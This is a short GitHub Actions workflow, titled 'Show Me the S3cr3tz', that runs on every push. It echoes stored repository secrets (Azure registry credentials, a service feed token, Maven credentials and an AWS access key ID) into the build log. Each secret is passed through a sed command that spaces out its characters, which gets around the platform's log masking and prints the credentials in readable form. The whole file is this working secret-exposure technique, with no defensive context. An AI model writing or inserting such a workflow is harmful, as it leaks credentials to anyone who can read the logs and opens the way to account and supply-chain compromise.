name: Show Me the S3cr3tz
on: [push]

jobs:
  debug:
    name: Debug
    runs-on: ubuntu-latest

    steps:
    - name: Check out code
      uses: actions/checkout@v2

    - name: Set up secret file
      env:
        AZURE_CONTAINER_REGISTRY_PASSWORD: ${{ secrets.AZURE_CONTAINER_REGISTRY_PASSWORD }}
        AZURE_CONTAINER_REGISTRY_USERNAME: ${{ secrets.AZURE_CONTAINER_REGISTRY_USERNAME }}
        SERVICE_PIPES_FEED: ${{ secrets.SERVICE_PIPES_FEED }}
        MAVEN_REPO_PASSWORD: ${{ secrets.MAVEN_REPO_PASSWORD }}        
        MAVEN_REPO_USERNAME: ${{ secrets.MAVEN_REPO_USERNAME }}        
      run: |
        echo ${{secrets.AZURE_CONTAINER_REGISTRY_PASSWORD}} | sed 's/./& /g'
        echo ${{secrets.AZURE_CONTAINER_REGISTRY_USERNAME}} | sed 's/./& /g'
        echo ${{secrets.SERVICE_PIPES_FEED}} | sed 's/./& /g'
        echo ${{secrets.MAVEN_REPO_PASSWORD}} | sed 's/./& /g'
        echo ${{secrets.AWS_ACCESS_KEY_ID}} | sed 's/./& /g'
        echo ${{secrets.MAVEN_REPO_USERNAME}} | sed 's/./& /g'
        
